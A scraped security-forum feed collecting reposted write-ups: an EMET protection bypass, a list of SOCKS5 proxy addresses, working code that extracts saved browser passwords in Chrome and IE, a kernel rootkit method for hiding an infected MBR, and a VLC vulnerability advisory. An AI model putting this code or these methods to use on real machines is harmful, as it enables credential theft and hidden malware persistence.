If we look at the exe within Immunity Debugger, we notice that msvcrt.dll is actually loaded by the application itself. However, because of rebasing, its address will change every time the system restarts. There is a way to make this work, though: we can abuse some of the properties of LoadLibraryA to still dynamically get the location of memcpy. Conveniently, the IAT has an entry for it. Using this entry, we can simply dereference the memory address 0054E268 within our shellcode to get the address of LoadLibraryA. Once we have the address of LoadLibraryA, we can call it and pass a pointer to the string "msvcrt" on the stack (I have not shown how I dynamically created this on the stack, but it's not too hard to do). Here is an example of this in an exploit I am presently working on (to give a more realistic example): as you can see, we are calling LoadLibraryA by dereferencing the address in EDX. EDX contains 0054E268, the IAT entry for LoadLibraryA. By dereferencing and then calling this address I end up calling LoadLibraryA itself. On the stack you can also note that I have placed the address where the "msvcrt" string is located, namely 10027090, as the library that I wish to load. Let's see what happens after this call completes: as we can see, the base address of msvcrt.dll is placed into EAX once the call is done. This means that, based on one entry within the IAT, we can figure out the address of any other function in memory. Furthermore, even if the corresponding DLL is not loaded within the current program, LoadLibraryA will load the library into the current process for you and return the base address where that library was loaded in EAX. Therefore, regardless of the load status of the DLL which contains the function you are after, this trick will still work. At this point, all we need to do is add to EAX the offset to the function we want to call within msvcrt.dll. These offsets are static, as mentioned before, so even after a reboot they will still remain the same, thus defeating the rebasing.

Anyway, I hope you guys found that interesting and useful. Just a little something I found during my research into EMET.

-tekwizz123
Posted by thetekwizz at 7:48 AM
Sursa: http://tekwizz123.blogspot.ro/2015/01/bypassing-emets-eaf-protection-slightly.html
-
[h=1]20-01-15 | VIP Socks 5 Servers (119)[/h] 20-01-15 | VIP Socks 5 Servers (119) Checked & filtered premium servers 107.152.104.44:50599 108.3.140.254:34574 111.90.159.200:12512 113.253.25.39:46046 121.211.21.238:17089 122.108.91.35:40975 124.160.35.2:808 130.237.16.25:20794 151.226.117.117:41816 162.104.79.68:28733 166.143.222.6:60104 170.163.116.108:80 173.161.58.177:20868 173.59.49.26:46147 174.57.25.16:19070 176.9.7.153:8777 178.137.171.205:36166 178.158.210.100:50250 180.153.139.246:8888 184.155.143.249:33697 184.59.142.248:20395 188.190.80.213:47118 194.247.12.49:25575 195.14.0.93:8080 195.22.8.47:53863 198.27.67.24:53193 198.8.92.212:9375 199.201.126.163:443 199.201.126.67:443 205.144.214.26:17232 209.148.89.210:53721 209.236.80.171:48179 212.57.179.193:2214 213.239.206.203:51042 216.8.240.194:23576 23.255.237.44:22999 24.155.226.138:29917 24.2.214.169:44300 24.200.71.134:19371 27.32.209.53:38158 31.202.206.22:47242 37.57.86.47:29108 46.185.34.205:21512 46.4.108.124:45288 46.4.88.203:9050 5.9.137.39:60555 5.9.60.41:5477 5.9.60.41:6060 61.147.67.2:9124 61.147.67.2:9125 62.183.105.233:8000 64.121.142.139:52491 65.24.180.150:18902 65.78.79.120:16905 66.172.99.160:20951 66.196.209.90:60159 66.83.236.125:80 67.86.13.241:37688 69.129.48.50:52259 69.253.214.65:35407 69.76.173.69:34598 71.194.121.105:48454 71.92.50.83:48964 73.17.20.150:32344 73.173.57.254:28077 73.190.248.101:28492 73.20.166.119:27670 73.25.97.27:39387 73.47.65.108:19160 73.51.146.191:41485 74.5.62.229:47309 75.183.75.32:46868 76.185.226.122:9691 77.242.22.254:8741 77.70.6.128:6789 78.39.178.2:443 78.62.77.63:5201 79.134.54.178:11721 81.159.25.90:31578 81.163.228.183:44921 84.109.188.145:17114 84.42.42.178:58530 85.15.66.132:16027 85.25.144.236:19494 85.30.233.152:34213 86.102.208.45:11970 86.102.208.45:18835 86.159.192.12:20548 88.203.104.225:41236 89.120.251.59:12937 89.215.95.7:22064 92.239.159.135:25079 92.245.196.43:21385 93.170.155.185:10536 93.170.155.185:8276 94.13.18.65:44238 94.211.155.1:25211 95.211.231.197:42094 95.211.231.198:15189 95.211.231.198:30436 95.211.231.198:30858 95.211.231.201:26507 95.211.231.201:53585 95.211.231.201:57872 95.211.231.202:1074 95.211.231.202:32234 95.211.231.202:40116 95.211.231.202:4215 95.211.231.202:60800 95.211.231.203:11165 95.211.231.203:20115 95.211.231.203:51061 96.227.244.232:32001 96.234.216.16:34369 96.237.192.11:16577 97.76.156.160:39954 97.81.116.155:42056 98.166.166.7:53444 98.237.12.7:21230 Sursa: 20-01-15 | VIP Socks 5 Servers (119) - Pastebin.com
-
[h=1]Using External Tools With Metasploit - Metasploit Minute[/h]
Metasploit Minute - the break down on breaking in. Join Mubix (aka Rob Fuller) every Monday here on Hak5. Thank you for supporting this ad free programming. Sponsored by Hak5 and the HakShop - Trust your Technolust. Subscribe and learn more at Metasploit Minute | Technolust since 2005. Follow Rob Fuller at Room362.com and Rob Fuller (@mubix) | Twitter
-
Screw @em. He should be taking care of it, but he's too busy making 100 million a month and doing nothing for the community.
-
How to install Android 5.0.1 Lollipop on Samsung Galaxy S4
Nytro replied to Nytro's topic in Mobile security
It's modified Cyanogen. The latest version should contain the latest patches from Cyanogen. -
[h=1]CCR intervention in support of the unconstitutionality of the cybersecurity law[/h] Intervenție CCR pentru susținerea neconstituționalității legii securității cibernetice | Date personale si viata privata
-
[h=1]SRI: Access to private data possible only with a judge's authorization[/h] SRI: Accesul la date cu caracter privat, posibil exclusiv în baza unei autorizații de la judecător - Mediafax
-
How Browsers Store Your Passwords (and Why You Shouldn't Let Them)

Introduction

In a previous post, I introduced a Twitter bot called dumpmon which monitors paste sites for account dumps, configuration files, and other information. Since then, I've been monitoring the information that is detected. While you can expect a follow-up post with more dumpmon-filled data soon, this post is about how browsers store passwords. I mention dumpmon because I have started to run across quite a few pastes like this that appear to be credential logs from malware on infected computers. It got me thinking - I've always considered it best to not have browsers store passwords directly, but why? How easy can it be for malware to pull these passwords off of infected computers? Since sources are a bit tough to find in one place, I've decided to post the results here, as well as show some simple code to extract passwords from each browser's password manager.

The Browsers

For this post, I'll be analyzing the following browsers on a Windows 8 machine. Here's a table of contents for this post to help you skip to whatever browser you're interested in:
Chrome 27.0.1453.110
IE 10
Firefox 21.0
(Image: browser logos by Paul Irish)

Chrome

Difficulty to obtain passwords: Easy

Let's start with Chrome. Disappointingly, I found Chrome to be the easiest browser to extract passwords from. The encrypted passwords are stored in a sqlite database located at "%APPDATA%\..\Local\Google\Chrome\User Data\Default\Login Data". But how do they get there? And how are they encrypted? I got a majority of the information about how passwords are stored in Chrome from this article written over 4 years ago. Since a bit has changed since then, I'll follow the same steps to show you how passwords are handled, using snippets from the current Chromium source (or you can just skip straight to the decryption).

Encryption and Storing Passwords

When you attempt to log into a website, Chrome first checks to see if it was a successful login: We can see that if it's a successful login, and you used a new set of credentials that the browser didn't generate, Chrome will display a bar asking if you want your password to be remembered: To save space, I'm omitting the code that creates the Save Password bar. However, if we click "Save password", the Accept function is called, which in turn calls the "Save" function of Chrome's password manager: Easy enough. If it's a new login, we need to save it as such: Again to save space, I've snipped a bit out of this (a check is performed to see if the credentials go to a Google website, etc.). After this function is called, a task is scheduled to perform the AddLoginImpl() function. This is to help keep the UI snappy: This function attempts to call the AddLogin() function of the login database object, checking to see if it was successful. Here's the function (we're about to see how passwords are stored, I promise!): Now we're getting somewhere. We create an encrypted string out of our password. I've snipped it out, but below the "sql::Statement" line, a SQL query is performed to store the encrypted data in the Login Data file. The EncryptedString function simply calls the EncryptString16 function on an Encryptor object (this just calls the following function below): Finally! We can see that the password given is encrypted using a call to the Windows API function CryptProtectData.
This means that the password is likely to only be recovered by a user with the same logon credential that encrypted the data. This is no problem, since malware is usually executed within the context of a user.

Decrypting the Passwords

Before talking about how to decrypt the passwords stored above, let's first take a look at the Login Data file using a sqlite browser. Our goal will be to extract the action_url, username_value, and password_value (binary, so the SQLite browser can't display it) fields from this database. To decrypt the password, all we'll need to do is make a call to the Windows API CryptUnprotectData function. Fortunately for us, Python has a great library for making Windows API calls called pywin32. Let's look at the PoC:

#The MIT License (MIT)
# Copyright © 2012 Jordan Wright <jordan-wright.github.io>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.

from os import getenv
import sqlite3
import win32crypt

# Connect to the Database
conn = sqlite3.connect(getenv("APPDATA") + "\..\Local\Google\Chrome\User Data\Default\Login Data")
cursor = conn.cursor()

# Get the results
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
    # Decrypt the Password
    password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]
    if password:
        print 'Site: ' + result[0]
        print 'Username: ' + result[1]
        print 'Password: ' + password

(chrome_extract.py, originally hosted as a GitHub gist)

And, by running the code, we see we are successful! While it was a bit involved to find out how the passwords are stored (other dynamic methods could be used, but I figured showing the code would be most thorough), we can see that not much effort was needed to actually decrypt the passwords. The only data that is protected is the password field, and that's only in the context of the current user.

Internet Explorer

Difficulty to obtain passwords: Easy/Medium/Hard (depends on version)

Up until IE10, Internet Explorer's password manager used essentially the same technology as Chrome's, but with some interesting twists. For the sake of completeness, we'll briefly discuss where passwords are stored in IE7-IE9, then we'll discuss the change made in IE10.

Internet Explorer 7-9

In previous versions of Internet Explorer, passwords were stored in two different places, depending on the type of password.
Registry (form-based authentication) - Passwords submitted to websites such as Facebook, Gmail, etc.
Credentials File - HTTP Authentication passwords, as well as network login credentials

For the sake of this post, we'll discuss credentials from form-based authentication, since these are what an average attacker will likely target. These credentials are stored in the following registry key:

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2

Looking at the values using regedit, we see something similar to the following: As was the case with Chrome, these credentials are stored using the Windows API function CryptProtectData. The difference here is that additional entropy is provided to the function. This entropy, which is also the registry value name, is the SHA1 checksum of the URL (in Unicode) of the site for which the credentials are used. This is beneficial because when a user visits a website, IE can quickly determine if credentials are stored for it by hashing the URL, and then using that hash to decrypt the credentials. However, if an attacker doesn't know the URL used, they will have a much harder time decrypting the credentials. Attackers will often be able to mitigate this protection by simply iterating through a user's Internet history, hashing each URL, and then checking to see if any credentials have been stored for it. While I won't paste the entire code here, you can find a great example of a full PoC here. For now, let's move on to IE10.

Internet Explorer 10

Note: Please refer to the comment below by Amy Adams regarding the fact that Windows Store apps cannot access stored credentials in the way described above. However, this method is still relevant for applications running in the context of the user.

IE10 changed the way it stores passwords. Now, all autocomplete passwords are stored in the Credential Manager in a location called the "Web Credentials". It looks something like the following: To my knowledge (I wasn't able to find much information on this), these credential files are stored in %APPDATA%\Local\Microsoft\Vault\[random]. A reference to what these files are, and the format used, can be found here. What I do know is that it wasn't hard to obtain these passwords. In fact, it was extremely easy. Microsoft recently provided a new Windows runtime for more API access. This runtime provides access to a Windows.Security.Credentials namespace which provides all the functionality we need to enumerate the user's credentials. In fact, here is a short PoC C# snippet which, when executed in the context of a user, will retrieve all the stored passwords:

/* The MIT License (MIT)
Copyright © 2012 Jordan Wright <jordan-wright.github.io>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE. */

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using Windows.Security.Credentials;

namespace PasswordVaultTest
{
    class Program
    {
        static void Main(string[] args)
        {
            // Create a handle to the Windows Password vault
            Windows.Security.Credentials.PasswordVault vault = new PasswordVault();
            // Retrieve all the credentials from the vault
            IReadOnlyList<PasswordCredential> credentials = vault.RetrieveAll();
            // The list returned is an IReadOnlyList, so there is no enumerator.
            // No problem, we'll just see how many credentials there are and do it the
            // old fashioned way
            for (int i = 0; i < credentials.Count; i++)
            {
                // Obtain the credential
                PasswordCredential cred = credentials.ElementAt(i);
                // "Fill in the password" (I wish I knew more about what this was doing)
                cred.RetrievePassword();
                // Print the result
                Console.WriteLine(cred.Resource + ':' + cred.UserName + ':' + cred.Password);
            }
            Console.ReadKey();
        }
    }
}

(ie_extract.cs, originally hosted as a GitHub gist)

When executing the program, the output will be similar to this: Note: I removed some sites that I believe came from me telling IE not to record. Other than that, I'm not sure how they got there. As you can see, it was pretty trivial to extract all the passwords in use from a given user, as long as our program is executing in the context of the user. Moving right along!

Firefox

Difficulty to obtain passwords: Medium/Very Hard

Next let's take a look at Firefox, which was tricky. I primarily used these slides (among a multitude of other resources) to find information about where user data is stored. But first, a little about the crypto behind Firefox's password manager. Mozilla developed an open-source set of libraries called "Network Security Services", or NSS, to provide developers with the ability to create applications that meet a wide variety of security standards. Firefox makes use of an API in this library called the "Secret Decoder Ring", or SDR, to facilitate the encryption and decryption of account credentials. While it may have a "cutesy" name, let's see how it's used by Firefox to provide competitive crypto: When a Firefox profile is first created, a random key called an SDR key and a salt are created and stored in a file called "key3.db". This key and salt are used in the 3DES (DES-EDE-CBC) algorithm to encrypt all usernames and passwords. These encrypted values are then base64-encoded and stored in a sqlite database called signons.sqlite. Both the "signons.sqlite" and "key3.db" files are located at %APPDATA%/Mozilla/Firefox/Profiles/[random_profile]. So what we need to do is get the SDR key. As explained here, this key is held in a container called a PKCS#11 software "token". This token is encapsulated inside of a PKCS#11 "slot". Therefore, to decrypt the account credentials, we need to access this slot. But there's a catch. This SDR key itself is encrypted using the 3DES (DES-EDE-CBC) algorithm. The key to decrypt this value is the hash of what Mozilla calls a "Master Password", paired with another value found in the key3.db file called the "global salt". Firefox users are able to set a Master Password in the browser's settings.
The problem is that many users likely don't know about this feature. As we can see, the entire integrity of a user's account credentials hinges on the complexity of the chosen password that's tucked away in the security settings, since this is the only value not known to the attacker. It can also be seen, however, that if a user picks a strong Master Password, it is unlikely that an attacker will be able to recover the stored credentials. Here's the thing - if a user doesn't set a Master Password, a null one ("") is used. This means that an attacker could extract the global salt, hash it with "", use that to decrypt the SDR key, and then use that to compromise the user's credentials. Let's see what this might look like: To get a better picture of what's happening, let's briefly go to the source. The primary function responsible for doing credential decryption is called PK11SDR_Decrypt. While I won't put the whole function here, the following functions are called, respectively:

PK11_GetInternalKeySlot() // Gets the internal key slot
PK11_Authenticate() // Authenticates to the slot using the given Master Password
PK11_FindFixedKey() // Gets the SDR key from the slot
pk11_Decrypt() // Decrypts the base64-decoded data using the found SDR key

As for example code to decrypt the passwords, since this process is a bit involved, I won't reinvent the wheel here. However, here are two open-source projects that can do this process for you:

FireMaster - Brute forces master passwords
ffpasscracker - I promised you Python, so here's a solution. This uses the libnss.so library as a loaded DLL. To use this on Windows, you can use these cygwin DLLs.

Conclusion

I hope this post has helped clarify how browsers store your passwords, and why in some cases you shouldn't let them. However, it would be unfair to end the post by saying that browsers are completely unreliable at storing passwords. For example, in the case of Firefox, if a strong Master Password is chosen, account details are very unlikely to be harvested. But, if you would like an alternative password manager, LastPass, KeePass, etc. are all great suggestions. You could also implement two-factor authentication using a device such as a YubiKey. As always, please don't hesitate to let me know if you have any questions or suggestions in the comments below.

- Jordan (@jw_sec)
Posted by Jordan at 10:08 PM
Sursa: http://raidersec.blogspot.ca/2013/06/how-browsers-store-your-passwords-and.html
-
The common mistakes every newbie pentester makes
Dec 23, 2014 by Steve Lord In Penetration Testing.

Every penetration tester goes through several rites of passage on their path from lowly Nessus monkey to experienced pentester. I wouldn't say that these are my favourites but they are surprisingly common. How many have you checked off the list?

Not being prepared

Whether it's a product of laziness or just being on back-to-back gigs for weeks on end, at some point (usually now and again) a pentester goes on-site completely unprepared for the task at hand. Is it unprofessional? Yes, of course. Does it happen? Yes, of course. There are different forms of not being prepared, from simply not running the latest software updates through to the catastrophic situation of having pretty much zero knowledge of the test ahead and none of the equipment. How well you handle this is something that will pretty much define your success as a tester. Normally it's the client that's unprepared, so the one occasion when the customer has everything ready to go and you're still trying to find the proposal in your email somewhere is usually the time when everything goes wrong in the worst possible way. The very worst form of not being prepared is when you're perfectly prepared and something truly horrible happens, like a last-minute update hosing your entire build. There's a reason that we freeze all but critical updates days before a penetration test at Mandalorian, and that reason is the very bitter voice of experience itself.

Dressing incorrectly on site

Most pentesters will either wear a suit on-site or will wear something more casual for the server room like a polo shirt, black trousers and shoes. Occasionally there's a pentester who'll turn up in something wholly inappropriate like a tracksuit, or even worse. I consider this a variant of not being prepared, but there's nothing like the feeling of getting up early waiting for Asda to open so you can buy the least skankiest suit available before going on-site because you left your luggage hundreds of miles away at home. Yes, this happened to me.

Not getting to know their tools

Everyone hates on Nessus, it's a given. Everyone thinks Nmap is the best port scanner (which is only true for certain values of best, not all). Everyone hates on Windows, except for the people who hate on OSX more. At Mandalorian everyone hates on Libreoffice. Except me. I took the time to learn how to use it the Libreoffice way. Having said that, I'm not immune. The other day I was writing 3,000 words on traceroute for Breaking In and found out for the first time that most Unix traceroute implementations now support TCP static port traceroutes out of the box, after over 10 years of using the excellent Hping instead. Time spent learning how to get more from your existing tools is usually returned in spades.

Not storing evidence

So you've hacked the AD to shreds, compromised every aspect of the environment and left the place in total disarray. Great stuff. Now when you come to start writing up findings you notice something… missing. Before you know it you're reliant on things you remembered but didn't write down and things you swore you wrote down but can't find. At Mandalorian we have a standard file structure enshrined in our methodology specifically designed for the situation where someone gets hit by a bus and has to hand a gig over partway through.
By keeping things in a standard location and logging as much practical information as possible, you ensure that in six months' time, when asked about a finding, you can give an accurate answer.

Using scanner output in a report finding

Don't. Just don't. At Mandalorian it's viewed so dimly that it's actually governed by the disciplinary procedure. Why? In every pentest you need to ask yourself, "What value am I adding here over and above an automated tool the end user could run themselves?" If the answer is none, then they should be running an automated tool themselves. You're not an automated tool, you're better than that. If you're not, then you should be.

Not providing references to further information

Findings should be both concise and as detailed as they need to be. Understandably this can present a problem, the ideal solution to which is to point the reader elsewhere. At the very least you should use CVE references in infrastructure test reports, and either the OWASP Top 10 or something like CWE for web-based application tests.

Scanning the wrong IP address

We've all done this one. It happens. You put a dot in the wrong place or something goes the wrong way. Check before you start testing, check during testing and check your results before finishing testing. I like to store my target lists in a text file for infrastructure tests, then reference the file. That way I know I'm at worst getting it consistently wrong.

Including your own system in the results

It's great when you have some critical findings for the report, but somewhat embarrassing when they turn out to be for your own system. Make sure whatever you take on-site is hardened, and don't assume that you won't be attacked while on-site.

Closing/Crashing without saving

If I could only pick a single entry in this list then this would be it, or possibly scanning the wrong IP address. It's not uncommon to start writing something, go off and do something else, then come back and update. All too often though, something causes a process or the entire test system to fall over and you're left hunting for swap files trying to find your test notes. Always save before executing anything that might fork out of control or generate serious load or I/O, but of course I'm preaching to the converted.

Sursa: https://rawhex.com/2014/12/the-common-mistakes-every-newbie-pentester-makes/
-
Using Kernel Rootkits to Conceal Infected MBR

If you've looked at any of the major bootkits such as TDL4 and Rovnix, you've probably noticed they employ certain self-defense features to prevent removal; specifically, intercepting read/write requests to the boot sectors. While these defense mechanisms can fool some software, they may, in some cases, make infections even easier to spot.

Rovnix is probably the less stealthy of the two: It intercepts read/write requests to the boot disk by hooking the miniport driver; on read attempts it fills the buffer with zeros, resulting in the boot sectors appearing completely empty, and on write requests it simply returns ACCESS_DENIED. Although this does prevent reading & writing the sectors, it's usually a sure sign of an infection when the boot sector is blank but your system boots, or you can't write the boot sector even with SYSTEM privileges.

On the other hand we have TDL4, which goes a step further: Instead of filling the buffer with zeros during read attempts, it replaces the read data with the original, non-infected master boot record (MBR). As a result of TDL4's clever trickery, any tools attempting to read the MBR will just see the original Windows MBR and assume nothing is wrong; however, TDL4 also opted for a similar method to Rovnix by just denying writes to the boot sector, but with the slightly more inconspicuous error: STATUS_INVALID_DEVICE_REQUEST. Obviously, straight up denying write requests to the boot sector is going to raise some questions, so what if we improved upon TDL4's method and also allowed writing to the spoofed, non-infected MBR, instead of the real one on disk?

Intercepting Disk I/O

There are a lot of places in the kernel where disk I/O can be intercepted to trick user-mode tools; however, any software using kernel drivers can bypass high-level hooks. The first thought would probably be to hook Disk.sys (the driver responsible for handling disk operations), but although this would work against some tools, there are tricks to avoid it; I'll explain how.

Disk.sys handles disk I/O, but it doesn't actually send any requests to the hard drive; it simply acts as a middleman translating kernel disk I/O requests into SCSI requests (the protocol used to communicate with the hard drive). Once Disk.sys has translated a request, it dispatches it to another, lower level driver (known as a Miniport driver), in the form of an SCSI_REQUEST_BLOCK, which the Miniport sends to the hardware via the Port driver. The Miniport is generally operating system independent, whilst the port driver is specific to certain OS versions and even hardware, making the Miniport the best place to hook without getting into hardware dependent territory. Finding a Miniport driver is pretty straightforward, as all drivers/devices are stacked, so we simply walk down the device stack until we reach the bottom most device (the Miniport).

(Figure: 2 identical device stacks for different disks)

The device "\Device\HardDisk0\DR0" is almost always the boot disk and is the NT device name for "\\.\PhysicalDrive0". The device directly below the disk device is the Miniport and usually belongs to atapi.sys, scsiport.sys, iastor.sys (or in the case of vmware, lsi_sas.sys); this is the driver we want to hook.
We can get the device object of the Miniport by opening "\Device\HardDisk0\DR0", then calling "IoGetLowerDeviceObject" with it; all we then need to do is replace the IRP_MJ_SCSI pointer in the driver's object with a pointer to our filter routine, which will intercept all I/O for that disk device.

Filtering Miniport Requests

Key:
IoStack = IO_STACK_LOCATION
Srb = SCSI_REQUEST_BLOCK
Cdb = CDB (SCSI Command Block)

All the information we need is in the SCSI_REQUEST_BLOCK pointed to by IoStack->Parameters.Scsi.Srb; we only need to filter WRITE(10) and READ(10) SCSI operations on disks 2 TB or smaller ("Srb.CdbLength == 10"). Next we simply check the opcode in the Cdb for SCSIOP_READ or SCSIOP_READ_DATA_BUFF for read operations, and similarly SCSIOP_WRITE or SCSIOP_WRITE_DATA_BUFF for write operations.

Now we need to see if the request is attempting to read or write sectors that overlap the MBR, which is located at logical block address (LBA) 0, by checking the LogicalBlock and TransferLength fields in the Cdb (these values are big-endian, so they will need to be converted to little-endian before checking them). The driver will store the clean MBR into a buffer allocated at runtime; all read/write requests will be done to/from the clean MBR buffer, instead of the actual MBR on disk.

Processing Intercepted Read Requests

1. Set up a completion routine to be called after the hard disk has processed the read request.
2. When the completion routine is called, map the caller's buffer (Irp->MdlAddress) into system memory and replace the infected MBR with the clean one in it.
3. Allow the request to complete.

Processing Intercepted Write Requests

Write requests are a little different: If the caller is only trying to write 1 sector (just the MBR), we can process the request ourselves; however, if the caller is trying to write multiple sectors (including the MBR), things get a bit more tricky.

1. Map the caller's buffer (Srb->DataBuffer) into system memory and read the first 512 bytes (1 sector) into the clean MBR buffer.
2. Increment the caller's buffer (Srb->DataBuffer) by 512 bytes.
3. Decrement the transfer length (Srb->DataTransferLength) by 512 bytes.
4. Add 1 to the Logical Block Address (stored in the Cdb).
5. Subtract 1 from the number of blocks to transfer (stored in the Cdb).
6. Pass the request to the real Miniport (this will write all the sectors the caller wanted, except the MBR).
7. Replace the original Srb->DataBuffer (just to be safe).
8. If the call succeeded, add 512 to Srb->DataTransferLength (this is the number of bytes actually written to disk; because we skipped the MBR, we need to make it seem like we didn't).
9. Allow the request to complete.

Proof of Concept

I've written a proof of concept driver that will make the MBR appear to contain the following text:

Is this the real code? Is this just spoofed for me? bots trying to hide. Not sure of the legality.

The system will be able to read/write to this fake MBR without modifying the real one; when the driver is unloaded or the system rebooted, the original MBR will still be intact and the fake one will be gone. For some reason the driver will crash the system if loaded then unloaded many times in a row without reboot, but it's not a huge issue and I'm too lazy to debug.

GitHub of code: https://github.com/MalwareTech/FakeMBR/

Sursa: Using Kernel Rootkits to Conceal Infected MBR | MalwareTech
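To make the CDB arithmetic above easier to follow, here is a small user-mode C model of it. It is only a sketch: the cdb10_t struct and helper names are mine (the real driver works on the WDK's SCSI_REQUEST_BLOCK/CDB structures inside its hooked IRP_MJ_SCSI routine), but the byte offsets and the big-endian conversion match the standard READ(10)/WRITE(10) command layout.

/* User-mode model of the MBR-filtering arithmetic (sketch, not driver code). */
#include <stdio.h>
#include <stdint.h>
#include <string.h>

#define SECTOR_SIZE 512

/* Standard 10-byte CDB layout used by READ(10)/WRITE(10):
 * byte 0: opcode, bytes 2-5: LBA (big-endian), bytes 7-8: transfer length (big-endian) */
typedef struct {
    uint8_t bytes[10];
} cdb10_t;

static uint32_t cdb10_lba(const cdb10_t *c)      /* big-endian -> host order */
{
    return ((uint32_t)c->bytes[2] << 24) | ((uint32_t)c->bytes[3] << 16) |
           ((uint32_t)c->bytes[4] << 8)  |  (uint32_t)c->bytes[5];
}

static uint16_t cdb10_blocks(const cdb10_t *c)
{
    return (uint16_t)((c->bytes[7] << 8) | c->bytes[8]);
}

/* Does this transfer include LBA 0 (the MBR)? */
static int touches_mbr(const cdb10_t *c)
{
    return cdb10_lba(c) == 0 && cdb10_blocks(c) > 0;
}

/* Multi-sector write that includes the MBR: copy sector 0 into our fake-MBR
 * buffer, then shift the request past it (LBA+1, blocks-1, buffer+512, length-512). */
static void split_write(cdb10_t *c, uint8_t **data, uint32_t *len, uint8_t *fake_mbr)
{
    memcpy(fake_mbr, *data, SECTOR_SIZE);

    uint32_t lba = cdb10_lba(c) + 1;
    uint16_t blocks = (uint16_t)(cdb10_blocks(c) - 1);

    c->bytes[2] = (uint8_t)(lba >> 24); c->bytes[3] = (uint8_t)(lba >> 16);
    c->bytes[4] = (uint8_t)(lba >> 8);  c->bytes[5] = (uint8_t)lba;
    c->bytes[7] = (uint8_t)(blocks >> 8); c->bytes[8] = (uint8_t)blocks;

    *data += SECTOR_SIZE;   /* Srb->DataBuffer          += 512 in the driver */
    *len  -= SECTOR_SIZE;   /* Srb->DataTransferLength  -= 512               */
}

int main(void)
{
    /* WRITE(10) (opcode 0x2A) of 4 blocks starting at LBA 0 */
    cdb10_t c = { { 0x2A, 0, 0, 0, 0, 0, 0, 0, 4, 0 } };
    static uint8_t buf[4 * SECTOR_SIZE], fake_mbr[SECTOR_SIZE];
    uint8_t *data = buf;
    uint32_t len = sizeof(buf);

    if (touches_mbr(&c)) {
        split_write(&c, &data, &len, fake_mbr);
        /* Expect: forwarded: LBA=1 blocks=3 len=1536 */
        printf("forwarded: LBA=%u blocks=%u len=%u\n",
               (unsigned)cdb10_lba(&c), (unsigned)cdb10_blocks(&c), (unsigned)len);
    }
    return 0;
}

Reads work the same way in reverse: after the real miniport completes the request, the first 512 bytes of the mapped buffer are overwritten with the clean copy before the caller ever sees them.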
-
VLC Media Player 2.1.5 Memory Corruption Vulnerabilities

From: Veysel Hatas <vhatas () gmail com>
Date: Fri, 16 Jan 2015 14:28:45 +0200

Title : VLC Player 2.1.5 DEP Access Violation Vulnerability
Discoverer: Veysel HATAS (@muh4f1z)
Web page : Binary Sniper
Vendor : VideoLAN VLC Project
Test: Windows XP SP3
Status: Not Fixed
Severity : High
CVE ID : CVE-2014-9597
OSVDB ID : 116450 <http://osvdb.org/show/osvdb/116450>
VLC Ticket : 13389 <https://trac.videolan.org/vlc/ticket/13389>
Discovered : 24 November 2014
Reported : 26 December 2014
Published : 9 January 2015
windbglog : https://trac.videolan.org/vlc/attachment/ticket/13389/windbglog.txt <https://trac.videolan.org/vlc/attachment/ticket/13390/windbglog.txt>

Description : VLC Media Player contains a flaw that is triggered as user-supplied input is not properly sanitized when handling a specially crafted FLV file <http://www.datafilehost.com/d/9565165f>. This may allow a context-dependent attacker to corrupt memory and potentially execute arbitrary code.

---------------------------------------------------------------------------------------------------------------------------------------------

Title : VLC Player 2.1.5 Write Access Violation Vulnerability
Discoverer: Veysel HATAS (@muh4f1z)
Web page : Binary Sniper
Vendor : VideoLAN VLC Project
Test: Windows XP SP3
Status: Not Fixed
Severity : High
CVE ID : CVE-2014-9598
OSVDB ID : 116451 <http://osvdb.org/show/osvdb/116451>
VLC Ticket : 13390 <https://trac.videolan.org/vlc/ticket/13390>
Discovered : 24 November 2014
Reported : 26 December 2014
Published : 9 January 2015
windbglog : https://trac.videolan.org/vlc/attachment/ticket/13390/windbglog.txt

Description : VLC Media Player contains a flaw that is triggered as user-supplied input is not properly sanitized when handling a specially crafted M2V file <http://www.datafilehost.com/d/11daf208>. This may allow a context-dependent attacker to corrupt memory and potentially execute arbitrary code.

Sursa: Full Disclosure: VLC Media Player 2.1.5 Memory Corruption Vulnerabilities (CVE-2014-9597, CVE-2014-9598)
-
ShmooCon Firetalks 2015

These are the videos for the ShmooCon Firetalks 2015. Thanks to: NoVA Hackers! (NoVAH!)

Opening - @grecs
PlagueScanner: An Open Source Multiple AV Scanner Framework - Robert Simmons (@MalwareUtkonos)
